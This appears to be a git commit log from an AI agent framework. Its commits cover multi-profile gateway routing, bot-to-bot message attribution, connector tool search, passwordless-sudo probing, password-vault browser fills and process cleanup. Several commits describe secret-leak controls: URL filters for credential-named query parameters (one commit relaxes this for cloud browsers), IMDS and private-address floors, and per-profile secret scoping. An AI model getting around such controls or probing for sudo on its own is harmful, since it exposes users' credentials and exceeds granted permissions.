* fix(wisdom): default to agent-written notification summaries
* fix(wisdom): restore deferred install review and browse controls
* feat(wisdom): inspect installed setup with exact package provenance
* feat(wisdom): run native-approved installed setup steps with durable evidence
* fix(wisdom): recover interrupted setup with explicit native consent
* feat(wisdom): hand native installs into guided setup review
* fix(wisdom): continue requested setup with fixed notification copy
* fix(wisdom): preserve setup while waiting for a session model
* fix(wisdom): expose canonical setup review controls on desktop
* fix(wisdom): resume setup after recorded automatic updates
* fix(wisdom): make missing setup prerequisites recheckable
* chore(wisdom): align Agent with verified Gateway contract
* fix(wisdom): stop guessing team slugs in portal links
* fix(wisdom): retire pending advice on account sign-out
* fix(wisdom): cancel advice after terminal account revocation
* fix(wisdom): fence feed responses across account sign-out
* fix(wisdom): checkpoint signed-out feed before reactivation
* fix(wisdom): link proactive advice to scoped notification settings
* fix(wisdom): coalesce queued publication recommendations by version
* fix(wisdom): keep package review navigation local and deferable
* fix(wisdom): reflect installed state in discovery controls
* fix(wisdom): show exact checks before command confirmation
* chore(wisdom): pin bounded analytics privacy contract
* chore(wisdom): pin retired legacy notification contract
* feat(wisdom): review publisher usage with exact sharing copy
* fix(wisdom): align discovery and review check summaries
* fix(wisdom): show expired consent before confirmation
* fix(wisdom): require fresh review for legacy install controls
* fix(wisdom): preserve review expiry across check toggles
* fix(wisdom): retain update policy in native install reviews
* fix(wisdom): surface failed native card edits
* fix(wisdom): persist local command approval reviews
* fix(wisdom): use saved approvals for messaging commands
* test(wisdom): provide scan result in setup handoff fixture
* test(wisdom): exercise Telegram approvals with saved review state
* fix(wisdom): retain suppression policy for offline deferral
* fix(wisdom): reconsider candidates after deferred suppression expires
* fix(wisdom): bind review checks and report verified readiness separately
* fix(wisdom): persist accepted publication intent and recover exact outcomes
* fix(sync): pin UTF-8 tree ordering across writers
* chore(wisdom): pin organisation-scoped Gateway authorization
* fix(wisdom): restrict consent delivery to user-facing sessions
* chore(wisdom): refresh reviewed Gateway contract pin
* fix(wisdom): preserve kept tools in Blank Slate exclusions
* test(auth): reset anonymous fixture with a profile-scoped cache
* fix(wisdom): gate local surfaces and work on current profile entitlement
* fix(wisdom): invalidate quiet tool cache on entitlement changes
* test(wisdom): authorize local consent gateway fixtures
* fix(wisdom): keep entitlement decoding free of native crypto imports
* test(wisdom): provide local entitlement to demo CLI subprocess
* ci: leave upstream workflow unchanged in Wisdom PR
* fix(wisdom): ship package and contracts in Nix wheels
---------
Co-authored-by: hbizi <36184542+hbizi@users.noreply.github.com>
|
||
|
|
bffa5f75e4 |
test(terminal): trim NOPASSWD probe tests to behaviour contracts
Six tests became three: the _prepare_command wiring test, one parametrized probe test (rc 0 -> True, rc 1 -> False, unsupported backend -> never runs), and a headless guard proving the probe is not paid when no prompt can fire. The exact-kwargs assertion on `_run_bash(..., login=False, timeout=3, stdin_data=None)` froze incidental defaults and is gone. |
||
|
|
4fc64b6730 |
refactor(terminal): probe NOPASSWD only when a prompt would fire; drop the host-only probe
With BaseEnvironment supplying a backend-scoped probe to every production caller, the module-level host-only `_sudo_nopasswd_works` (and its TERMINAL_ENV gate) had no callers left; the `or` fallback and the outer try/except around a callback that already fails closed were dead too. Move the probe under `should_prompt_for_sudo`: headless callers (gateway, cron, delegated children) reach `(command, None)` whether or not the probe runs, so the extra backend round trip — an ssh exec on the SSH backend — was pure waste on every headless sudo command. test_subagent_sudo_prompt no longer needs to patch the host probe out: bare `_transform_sudo_command(cmd)` calls have no probe by construction. |
||
|
|
39abca492d |
fix(terminal): gate sudo probes by backend cancellation safety
Opt in only Local, Docker, SSH and Singularity: a timed-out `sudo -n true` probe on those backends kills one process, while SDK adapters (Modal, Daytona, Vercel) cancel by terminating the whole sandbox. Net of the original PR's commits f7db10ef + 9965b1b9 (the intermediate _ThreadedProcessHandle special-case was superseded by this gate). |
||
|
|
d38064e3c1 | fix(terminal): probe remote passwordless sudo | ||
|
|
45a6101f36 |
fix(gateway): secondary-profile send_message, notices and /loop wakeups go out via their own bot
Under gateway.multiplex_profiles a turn running for a secondary profile P resolved its live adapter by bare platform from runner.adapters — the DEFAULT profile's map — so P's send_message tool calls (send/react/media on slack, matrix, wecom, buzz, ntfy, every plugin platform), its "Gateway shutting down/restarted" and /update notices, its /loop wakeups, and its Discord bot's unauthorized-slash operator alert all left through the default bot (Telegram DMs landed in the user's chat with the other bot). Every such door now resolves through the profile-aware, fail-closed resolver already used by the inbound reply path (authz_mixin: _adapters_for_profile / _authorization_adapter / _adapter_for_source): P's own adapter, or None → a clear error, never the default bot. - tools/send_message_senders.py::_live_adapter — resolve via runner._authorization_adapter(platform, get_active_profile_name()); shared by _send_via_adapter, _handle_react/unreact, media sends, matrix E2EE fast path and the WeCom standalone sender. - gateway/authz_mixin.py — extract _adapters_for_profile (the whole map, for relay- aware resolve_delivery_transport callers); _authorization_adapter reuses it. - gateway/run_shutdown.py — shutdown/restart notice for a running session uses the session's source transport / agent:<profile>: key lane, never self.adapters. - gateway/slash_commands.py + run_notifications.py — /restart and /update markers persist `profile`; the restart notice, update result and update prompt resolve the requester's own adapter (legacy markers fall back to the session_key lane). /goal, /heartbeat, /approve, /deny confirmations use the source's own transport. - gateway/slash_commands_goals.py + run_goals.py — /loop persists `profile` in its route; the wakeup watcher scans every served profile's store under its own scope (same shape as _handoff_watcher) and fires through that profile's adapter map. - plugins/platforms/discord/adapter.py::_notify_unauthorized_slash — alert stays in the owning profile (its adapters and its home channels). - plugins/platforms/wecom/adapter.py::_standalone_send — via _live_adapter. - docs: website/docs/user-guide/multi-profile-gateways.md (outbound identity). Tests (red on base): tests/tools/test_send_message_multiplex_profile_adapter.py, tests/gateway/test_multiplex_notice_egress_profile_adapter.py. Co-authored-by: pierrenode <298902573+pierrenode@users.noreply.github.com> |
||
|
|
580322ef1e |
fix(mcp): stdio MCP children get the routed profile's vault secrets, not the default's
Under a multiplexed gateway, `_build_safe_env` forwarded `os.environ[name]` for every name tagged in the process-global `_SECRET_SOURCES` map. That map is filled by EVERY served profile's secret-source hydration, while `os.environ` only ever holds the LAUNCH (default) profile's values — so once any profile's 1Password/Bitwarden source supplied e.g. GITHUB_TOKEN, every profile's stdio MCP server was started with the default profile's token. Resolve those names through the active profile's secret scope (`get_secret`) instead: the routed profile's value, or omitted when that profile has none. Under multiplex `get_secret` never falls through to environ; single-profile runs keep the .env overlay + environ behaviour, so the existing "vault vars reach MCP subprocesses" contract still holds there. `secret_source_names()` exposes the tagged NAMES only — values are never read from the shared map. Docs: the multi-profile guide's "MCP subprocesses only see their own profile's secrets" claim is now true for source-injected names too; say so explicitly. |
||
|
|
1bd4e33d36 |
fix(vault): make browser_vault_fill work on the default Browser Use backend
On the default backend (browser.backend unset → browser_exec) the vault tools were advertised but could never fill: the CDP supervisor that carries the secret-bearing eval is started only by the built-in browser_* session path, so _eval_js_secret failed closed with supervisor_required and the origin pre-check fell back to an agent-browser CLI eval against a browser browser_exec never touched. - browser_exec now attaches SUPERVISOR_REGISTRY to the CDP endpoint it just routed the harness to (BU_CDP_WS/BU_CDP_URL), so the fill talks to the SAME browser over the same secret-capable WebSocket. BU direct-cloud (BU_AUTOSPAWN) exposes no endpoint and keeps the supervisor_required refusal. - CDPSupervisor.focus_page(origin, accept=<js>) (used by browser_vault_fill, next commits) re-attaches the page session to the open tab on the item's origin whose DOM holds the form being filled (browser_exec opens its own tabs; the supervisor's initial attach picks the first page target, which is chrome://new-tab-page). browser_vault_fill uses it before the origin pre-check with a per-kind probe (password input / card fields / address fields). Live: evals/vault_fill_live_e2e.py drives the real browser_exec tool against Hermes' packaged Chromium with the login page in the third tab; A/B with the attach line disabled fails at "did not attach a supervisor", enabled fills the password into the /login tab and card fields into the /checkout tab with every model-facing read scrubbed. Also: browser_vault_list/fill described the workflow as "type the identifier with fill_input", a helper that exists only inside browser_exec code (toolset browser-use) and is a ghost on the built-in stack. model_tools._rewrite_browser_vault substitutes the concrete name from the session's actual tool set (`fill_input` inside browser_exec, or browser_type), the same dynamic cross-reference pattern browser_navigate uses for web_search. |
||
|
|
4140901d15 |
fix(browser): stop refusing credential-named query params on cloud browser/extract backends
browser_navigate / browser_exec / web_extract refused any URL whose query carried a
credential-NAMED parameter (token, signature, access_token, ...) when the backend was
a cloud provider. That is exactly the shape of magic links, OAuth callbacks and signed
CDN assets, so on Browserbase/Browser Use the agent could not finish a sign-in flow or
open an X video asset ("Blocked: URL contains a credential-like query parameter").
The floor protected nothing: the cloud browser already sees every cookie and typed
password of the session, and with the credential vault it receives the real password at
fill time. Hermes' own secrets leaking into a URL stay blocked by the value-shaped
_PREFIX_RE check (_secret_url_error), which is backend-independent. IMDS and
private-address floors are unchanged.
|
||
|
|
b51da65258 |
fix: adapt execute_code cell authority to the widened prompt-callback table
_callback_api() now yields (getter, setter) pairs for every per-thread prompt (approval, sudo, vault unlock); the kernel cell captured and restored the old fixed 4-tuple. Iterate the table so a cell carries every callback and a future addition needs no change here. Test recorder unpacks the new shape. Also: perfectionist import order in ui-tui interfaces.ts (CI lint). |
||
|
|
ff90eb28ff |
test(bot-mode): trim the author and loop-guard suites to their invariants
Keep one or two behaviour tests per seam (author reset on a cached agent, forged _turn_author refused, guard trips and cools, single charge on the busy path) and drop the parser/setting enumerations. a2a_key goes with them: nothing in this PR reads it; the honcho follow-up that does can bring it back with its consumer. |
||
|
|
091ac34ba9 |
fix(bot-mode): qualify the peer-dm author id with the sender's hostname
message_agent sent a bare bot:<profile> id through hermes peer dm, so a remote coder and the recipient's own coder shared one author id. The peer branch now sends bot:<hostname>/<profile>, with the hostname cleaned like any author field and slashes dropped. The direct local path keeps the bare id. |
||
|
|
3db4defcc1 |
fix(bot-mode): qualify a relayed author from the local connection too
delivery_turn_author kept the bare bot:<profile> id when the sender's connection was the Desktop's own "local", so a DM relayed from that machine collided with the recipient's profile of the same name. A relayed DM always crosses gateways, so the connection id is now part of the id whenever the Desktop sends one, and only the direct message_agent path in tools/bot_mode_dm.py stays bare. The relay.ts and session_auto_continue.py comments added earlier are cut to one line each. |
||
|
|
d3c8bacbe3 |
fix(bot-mode): qualify relayed authors with the sender's connection id
A relayed DM stamped bot:<profile> on the recipient turn, so an ops profile on another machine and the local ops profile shared one author id. The Desktop now forwards from_connection with each bot_relay.deliver, and delivery_turn_author builds bot:<connection>/<profile> for it while the Desktop's own gateway ("local") keeps the bare id. An api author object accepts an optional origin string that yields the same shape.
|
||
|
|
6881e4d3fc |
fix(bot-mode): carry the relay sender into a live Bot Chat turn
When the target Bot Chat is already open on this gateway, the relay handler delivers through `prompt.submit` with `queued: true`, and that branch dropped the envelope's sender. The model still saw the text prefix, but the turn reached the agent unattributed, the exact case the subprocess branch fixes. The relay handler now stamps the author on the submit as a `DeliveryAuthor`, an in-process object a JSON client cannot build, so `prompt.submit` accepts it the way it accepts a hosted-room callback and refuses a dict with error 4124. The busy queue keeps an authored envelope in its own slot, the drain hands the author to the turn runner, and the runner passes it to an agent that declares the keyword. A plain prompt after an authored dm carries no author. Local deliveries to a desktop-owned Bot Chat take the live-owner mailbox instead. The admission intent and the mailbox record now carry the author, a retry under the same id with a different author is refused, and the owner gateway hands the author to the turn it runs. Isolated compute turns still run unattributed, because the compute-host frame has no author field. |
||
|
|
55b3ea0b11 |
fix(gateway): count each bot message once in the loop guard and consume the author variable
The Telegram adapter asks the authorization check before dispatch, the ingress gate asks it again, and the busy path asks a third time. Each call counted one loop-guard event, so a Telegram bot tripped the budget after a third of the configured messages. The verdict now only refuses a chat that is cooling down. The ingress gate counts an admitted bot message once. `parse_turn_author` treats only booleans, integers and the strings true/1/yes as a bot flag, and returns None for an author with neither id nor name. Names keep format characters and non-breaking spaces so emoji sequences survive. The quiet one-shot pops HERMES_TURN_AUTHOR before the turn so tool subprocesses do not inherit it. `max_events` must be a whole positive number. Issue numbers move out of code comments. |
||
|
|
16d15869ba |
feat(bot-mode): carry the sender through local and relay deliveries
a bot dm arrived as an ordinary user message. the only trace of the sender
was the "Message from" text prefix, which the model reads and nothing else
does. the recipient's memory provider saw its own configured user.
message_agent now passes the sender as {"id": "bot:<profile>", "name":
<handle>, "is_bot": true} to the delivery runner (--author <json>), which sets
HERMES_TURN_AUTHOR on the recipient one-shot only. the -Q turn reads it and
passes turn_author into run_conversation. the desktop relay forwards the
envelope's from_profile/from_handle to bot_relay.deliver, which sets the same
variable on its delivery turn. the runner drops any inherited author first so
a delivery without one stays unattributed. the text prefix is unchanged.
|
||
|
|
ac07e20407 |
fix: resolve subagent control authority from the live session slot
Subagent list/tail/steer/interrupt authorized against a per-record copy of the owning session's transport (`owner_transport`). That copy had to be re-synced at every reattach site; `_rebind_live_transport` did it for session.resume/activate but prompt.submit and the queued-prompt drain still attached bare, so a client that reconnected through a prompt (the common path on a remote gateway / Bot Mode switch) streamed fine while `subagent.list` returned [] and controls rejected. Read `owner_session_record["transport"]` at check time instead: the slot is already mutated by every attach/detach/viewer-failover path, so no site can forget the sync. `owner_transport` stays as the capture-time "commissioned by a gateway session" marker (None = no RPC authority ever); non-dict owners keep the exact-object rule. Drops the registration-time re-read and the attach-time registry loop. Diagnosis credit: nftpoetrist (#106663) — their prompt.submit / drain regression tests pass against this change with no call-site edits. |
||
|
|
37eb6e1b05 |
test(bot-mode): pin the waiter budget from Python constants, not relay.ts text
The waiter budget test read relay.ts with a regex, which AGENTS.md bans and which the Python CI lane would not rerun on an apps/-only PR. It now checks DESKTOP_DELIVER_TIMEOUT_SECONDS against the module's own constants and that REPLY_WAIT_SECONDS exceeds it. relay-deliver-budget.test.ts still pins the TS mirrors against those Python constants from the Desktop side. |
||
|
|
b1915cb02d |
fix(bot-mode): keep the relay waiter watching past the Desktop deliver deadline
The sender-side waiter gave up at 900s while the Desktop held bot_relay.deliver open for 1500s, so a turn finishing between minute 15 and minute 25 wrote a reply nobody read. REPLY_WAIT_SECONDS now rebuilds the Desktop budget from the same numbers and waits 60s past it. The two turn constants move into tools/bot_relay.py so the gateway handler and the waiter share one definition. |
||
|
|
49ef015ca3 | fix: join delegated work before finite chat exits | ||
|
|
b4d04eb8fd |
Connector tools (Gmail, Linear, Notion, ...) are searchable and callable through tool_search for signed-in Nous users (#106842)
* feat: add session-scoped connector access for onboarding
* fix(connectors): availability is the config flag AND the portal entitlement — no free-tier leg
The port carried a third availability leg from hermes-magic: a stored guest
(free-tier) identity short-circuits the managed-tool entitlement check. That
leg reads hermes_cli.anon_auth, which does not exist on hermes-agent main, so
connectors_available() raised ImportError inside its fail-closed try and the
whole connector surface was silently dark on a plain upstream checkout.
On this tree availability is the two-leg AND the design started with:
tools.connectors.enabled AND managed_nous_tools_enabled(). The free-tier leg
is a hermes-magic concern and belongs in hermes-magic's own delta over this
branch, next to the identity it depends on. Its integration test goes with it.
* docs(tool-search): connectors section — remote tools through the bridge
The squashed port carried the code but not the user-facing docs. Restores the
Connectors section of the Tool Search page and the connector-gateway host /
CONNECTOR_GATEWAY_URL override on the Tool Gateway page, updated for the
manage_connections tool and the pure-connector batch rule.
* fix(tool-search): connector tools rank with local tools in one pass instead of taking leftover slots
dispatch_tool_search ran BM25 over the local catalog, filled `limit` slots,
then appended connector hits only into slots left empty. On a 300-tool
catalog no slot was ever empty, so with Gmail and Google Calendar connected
"send gmail email" returned five betterstack tools and zero connector tools.
The gateway's hits for a query now become catalog entries (connector name,
slug words, description as the search text) and join the local catalog for
that query's BM25 pass. One ranking, one rarest-token admission rule for both
sources, `limit` as the total per query. The merge loop and the separate
record builder for connector hits are gone; `_shared_tool_record` serves both
sources.
The gateway search timeout rises from 8 s to 30 s. One request with six
use_cases measured 7 s, so 8 s sat on the edge and cut real answers off; the
failure path is unchanged (local-only results, no error to the model).
Live, 311 local tools + gateway, before -> after:
"send gmail email": 5 betterstack tools -> gmail SEND_EMAIL, CREATE_EMAIL_DRAFT
"read google calendar events": 5 betterstack tools -> googlecalendar EVENTS_LIST_ALL_CALENDARS
"linear create issue", "betterstack incident": unchanged
Benchmark (25 labelled queries): connector recall 0.09 -> 0.82, precision@5
0.18 -> 0.59, false positives on absent intents 17 -> 2.
* refactor(tool-search): connector leg into tools/connector_search.py
tools/tool_search.py is a facade. The connector leg (gateway hits as catalog
entries for tool_search, remote schemas for tool_describe, the
connections_in_scope gate) was appended to it by the port. It now lives in
its own sibling, tools/connector_search.py, and the facade imports the three
entry points: connections_in_scope, connector_entries_by_group,
remote_schemas_for.
No behaviour change. The tool_describe remote block became
remote_schemas_for(names, current_tool_defs, connector_describe) with the
same inputs, the same silent-degradation contract and the same injection
seam the tests already use.
* fix(tool-search): at most 7 queries per call, the gateway's search limit
One tool_search call sends all its queries to the connector gateway as one
search request. The gateway answers 7 use_cases per request and returns
HTTP 502 for 8 or more (measured 2026-09-09, re-measured with one-word
use_cases: it is a count limit, not a size limit). With the client cap at
10, a model sending 8 to 10 queries lost every connector hit for that call
and saw local-only results with no error.
The shared constant splits: _MAX_QUERIES_PER_CALL = 7 for search,
_MAX_DESCRIBE_NAMES_PER_CALL = 10 for describe, which has no remote count
limit. Eight or more queries now get the existing "too many queries" retry
hint before any request is made. No chunking: one call, one request.
* fix(tool-search): the model is told that connectors__ names are manage_connections accounts
tool_search results carry names like connectors__gmail__CREATE_EMAIL_DRAFT and
manage_connections is the tool that checks and connects those accounts, but
nothing told the model the two are the same thing. A model that hit
CONNECTION_REQUIRED had to infer the fix on its own.
The tool_search description gains one sentence making the link, added at
assembly only when manage_connections is in the session's tools. Signed out
or with connectors off the tool is absent and the description is unchanged,
so it never names a tool the model cannot call. This follows the existing
rule for cross-tool references (tools/AGENTS.md): they are added dynamically
from the session's actual tool set, never hardcoded in a schema.
Tool defs are fixed for the life of a conversation, so the description is
byte-stable per conversation; this is a one-time prefix change.
Live, real get_tool_definitions() against a signed-in home: sentence present.
Same home with auth.json removed: manage_connections absent, sentence absent.
* fix(connectors): /stop halts a connector batch before the next remote call
dispatch_connector_batch runs every remote entry of a tool_call batch in
sequence. The executor only checks the interrupt flag between tools, and
the whole batch is one tool to it, so a /stop landing during entry 1 of
20 still sent the other 19 to the gateway.
The loop now reads tools.interrupt.is_interrupted before each dispatch.
Once set, it stops calling handle_function_call and fills every unstarted
slot with the loop's existing error-slot shape, code INTERRUPTED and the
message "Stopped by the user before this call was made.", so the result
envelope stays valid and the counts stay honest. Entries already
dispatched keep their real results.
Test: three connector calls where the fake client sets the interrupt on
the first execute. The client sees exactly one call and slots 2 and 3
carry INTERRUPTED. Red on the base branch, green with the fix.
* test(connections): schema assertions become dispatch contracts
test_schema_documents_wait_and_its_timeout froze description fragments
("REQUIRED", "can NOT disconnect", "Nous Portal"). A wording edit fails
it while a real regression (a disconnect that reaches the gateway) does
not. That is a snapshot of prose, not a behaviour contract.
Delete it. The requirement that wait needs connectors is already covered
by test_wait_requires_connectors. The user-only disconnect boundary is
now asserted as behaviour: action disconnect with a connector returns an
error and the fake client records no call. That replaces the earlier
de-authenticate test, which only checked that the word "dashboard"
appeared in the error text.
Test count in the file goes from 26 to 25.
* docs(tool-search): connector batches are one gateway request per entry
The user guide said a connector batch travels as one gateway request. It
does not: model_tools_connectors.dispatch_connector_batch re-enters core
dispatch per entry, and each entry becomes its own execute request in
bridge._run_remote (plus at most one literal-slug retry when the gateway
reports TOOL_NOT_FOUND under the conventional slug). The docstrings in
tools/tool_gateway/bridge.py and tools/tool_gateway/__init__.py still
described the abandoned V1 plan and claimed nothing outside the package
imports it.
Rewrite those sentences to match the code: one request per entry, in
input order, dispatched from model_tools_connectors.py, with the per-entry
approval and interrupt behaviour that motivated the split. The guide also
still showed the single-call shape tool_call(name, arguments); both
places now show the `calls: [{name, arguments}]` array the schema
advertises and note that a single local call is an array of one.
Docs only, no test.
* fix(tools): the between-turns refresh never rewrites the bridge tools
The per-turn MCP refresh folds a fresh tool snapshot into the live array
with preserve_prefix: order and membership stay, but a name present in both
takes the fresh schema. That is right for ordinary tools, whose schema is a
constant. tool_search is the one tool whose description is derived from the
session: the deferred-tool count, the embedded listing, and, on this branch,
whether manage_connections was present. A late MCP server or one failed
portal lookup (manage_connections' check_fn fails closed) changed those bytes
on the next turn, and every byte after tool_search in the cached prefix was
re-prefilled. The array also contradicted itself in that case: the flapping
manage_connections was carried forward while the description lost its hint.
The bridge entries now keep the bytes they were built with for the life of
the conversation. Nothing is lost: tool_search reads the live catalog at
dispatch, so tools that arrived late are still found; connector availability
is checked at dispatch too. The compaction-boundary rebuild (content_aware,
the one sanctioned cache break) still refreshes the description.
Consequence: connector exposure in the prompt is decided once, at agent
build, by whether the user was signed in then. That is the intended
contract.
* refactor(tool-search): normalize_tool_call_entries lives with the other argument validation
The port appended the tool_call argument parser to the tool_search facade.
The family already has tools/tool_search_validation.py for exactly this
work (schema validation of deferred call arguments), so the parser moves
there and the facade imports it. No behaviour change; the one test that
imported it now imports from the defining module.
* refactor(connectors): delete the unused batch dispatcher; _run_remote becomes run_remote
bridge.dispatch_calls and its helpers (_dispatch_calls_inner, _run_pre_dispatch,
_run_local, _error_slot, _maybe_parse_json) and the LocalDispatch / PreDispatch
seams had no production caller. Connector dispatch runs through
model_tools_connectors: dispatch_connector_batch re-enters handle_function_call
once per entry, so scope, hook, approval and middleware policy fire against each
composed name inside core dispatch, and dispatch_connector_call hands the single
planned entry to the bridge's transport function. Only tests called the batch
dispatcher, and they exercised policy seams that production never wires.
The transport function is the module's real entry point, so it drops the
underscore: _run_remote becomes run_remote, body unchanged. The module
docstring now describes the two legs that exist (availability with D32 silent
degradation, and run_remote) instead of the injected seams. Imports that only
the deleted code used are gone; merge.py is untouched because every export
still has a caller.
Tests that drove dispatch_calls are deleted where they covered the removed
seams (pre_dispatch blocks and rewrites, local_dispatch classification, mixed
batches). The literal-slug fallback, the per-entry transport failure, and the
hook rewrite reaching the gateway request body are re-targeted at
handle_function_call('tool_call', ...) with the fake client swapped in at
bridge._default_client_factory, the same seam test_connector_dispatch_policy
uses. Each re-targeted test fails when the retry is disabled in run_remote.
* fix(connectors): search keeps the twin a colliding name reaches, and says so
format_connector_name strips the toolkit prefix, so GMAIL_FETCH_PROFILE and a
literal FETCH_PROFILE on gmail both compose to connectors__gmail__FETCH_PROFILE.
describe and execute decode that name to the prefixed slug first, so the
literal twin is unreachable under it. If a vendor ever shipped both, search
could describe the literal under a name that runs the prefixed tool.
Search is the one place that sees both twins in one response. It now keeps
the twin the name reaches and drops the other with a WARNING that names both
slugs, whichever the gateway listed first. Short names stay; no marker, no
per-process map, no change to describe or execute. No such pair exists in the
live catalog today; the guard turns a silent alias into a logged one.
|
||
|
|
cf4b78e91f |
fix(tool-search): a query no tool answers returns nothing, not five tools sharing one word (#106676)
search_catalog admitted every document with BM25 score > 0 and then padded
to `limit`. BM25 sums over the tokens a document shares with the query, so
on a 300-tool catalog "send gmail email" returned five incident tools that
shared only "email", and the discriminating word ("gmail", in no document)
had no say. The model read those as the answer.
Admission is now the query's rarest token: a document is a result only if it
contains the query token with the highest IDF, the one that names the intent.
Common verbs ("send", "read", "create") sit in dozens of documents and never
gate; vendor and object words ("gmail", "github", "incident") do. A token no
document carries admits nothing, and the existing empty-group hint tells the
model to retry without it. The name-substring fallback is deleted: it admitted
tools that matched no query token at all.
Result descriptions are clipped at 500 characters instead of 400. Over 353
vendor tool descriptions, 500 keeps 91% whole and every first sentence
(first-sentence max 329); 400 kept 82%.
Measured on the live 311-tool catalog with 25 hand-labelled queries:
precision@5 0.18 -> 0.43, wrong names returned 102 -> 66, false positives on
absent intents 17 -> 13. Live before/after: "send gmail email" went from five
betterstack tools to an empty group with the retry hint; "linear create issue"
and "betterstack incident" are unchanged.
|
||
|
|
b7bef04861 |
fix(kanban): an explicit scratch workspace never inherits the board's project
Move the "explicit scratch means no project" decision into the one resolver every surface funnels through, `kanban_db.create_task`: board-project inheritance now runs only when the caller left `workspace_kind` open (`None`), and `workspace_kind` defaults to scratch after that check. The tool handler keeps the #106347 fix for `project=""` (no `or` collapse) and `board=` scoping but drops its handler-local sentinel logic, since the resolver now owns the rule; the `self_task` project inheritance for dispatcher-owned workers is unchanged. Sibling surfaces had the same bug through the same line and are fixed by the same change: - CLI `hermes kanban create --workspace scratch` on a project-scoped board produced a project worktree; `--workspace` no longer defaults in argparse so the resolver can tell "omitted" from "scratch". - Dashboard `POST /tasks` with `workspace_kind: "scratch"` did the same; `CreateTaskBody.workspace_kind` defaults to `None` for the same reason. - `kanban_swarm.create_swarm` threads `None` through for consistency. Tests: one resolver invariant in test_kanban_board_project.py (explicit scratch stays scratch, omitted still inherits) and the salvaged tool test folded into a single parametrized matrix over scoped/unscoped target boards. |
||
|
|
dc5c87c6c1 |
fix(kanban): honor explicit scratch/project on MCP kanban_create
Pass the caller's board into create_task and treat explicit workspace_kind=scratch or empty project as no-project so ambient board project_id cannot override MCP args. Co-authored-by: Cursor <cursoragent@cursor.com> |
||
|
|
85e423482a |
fix(tools): kill the browser_exec CLI tree on timeout on Windows too
The salvaged fix only ran the CLI in its own session on POSIX and kept plain subprocess.run on Windows — the one platform where the wedge in #106244 is actually reproducible: CPython's run() retries an unbounded communicate() after kill() there, so a grandchild holding the capture pipes blocks the worker forever. On POSIX run() wait()s the PID and returns promptly; the grandchild merely leaks (live-reproduced on Linux). One code path for both platforms: - _group_popen_kwargs: start_new_session=True on POSIX, CREATE_NEW_PROCESS_GROUP + hide flags on Windows (replaces the hide-only _windows_popen_kwargs). - _kill_cli_process_group: os.killpg SIGKILL on POSIX, taskkill /T /F on Windows (same kwarg set as the sibling taskkill sites). - The Popen decodes with encoding="utf-8", errors="replace" like every other subprocess call in this file (windows footgun rule). - Drain test patches the kill helper instead of os.killpg so it runs on every host. Windows behaviour is not live-verifiable on this Linux host. |
||
|
|
6788c3224f |
test(tools): trim the browser_exec group-kill tests to two invariants
Drop test_gone_group_still_surfaces_timeout: the killpg-race branch is a contextlib.suppress and the test only pinned the exact communicate() timeout sequence (a change-detector). The real-grandchild test and the bounded-drain test remain — the two behaviour contracts of the fix. |
||
|
|
60debff28d |
fix(tools): kill the whole browser-use CLI process group on browser_exec timeout
subprocess.run only kills the direct CLI child on TimeoutExpired; a browser_harness daemon / Chrome helper grandchild inherits the stdout/ stderr pipes and keeps them open, so the internal communicate() blocks on pipe EOF forever. The wedged tool call never returns, its activity heartbeat keeps stamping last_activity_at every 30s, and the session is pinned at "now" in the desktop sidebar indefinitely (#106244). On POSIX, run the CLI in its own session (start_new_session=True) and SIGKILL the whole process group on timeout, then drain the pipes under a bounded deadline. Windows keeps subprocess.run. |